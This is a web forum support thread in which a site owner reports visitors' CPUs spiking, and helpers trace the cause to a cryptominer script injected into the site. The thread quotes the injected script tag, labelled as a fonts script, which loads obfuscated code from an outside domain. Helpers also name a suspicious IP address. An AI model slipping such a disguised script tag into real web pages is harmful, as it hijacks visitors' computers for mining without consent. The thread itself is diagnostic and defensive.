Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

They're CPU activity monitors are skyrocketing when they enter my site and then it drops once it closes it in the browser. Any suggestions?

View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

Thanks Dave.

Its chopcountry.com

I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results/www.chopcountry.com/forums/forum.php

I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviosuly wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.

At the bottom of your page you have:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->

which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.

At the bottom of your page you have:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->

which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.

How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smooth wit no issues for the last 5 years there was no reason for me to stay sharp on all of this.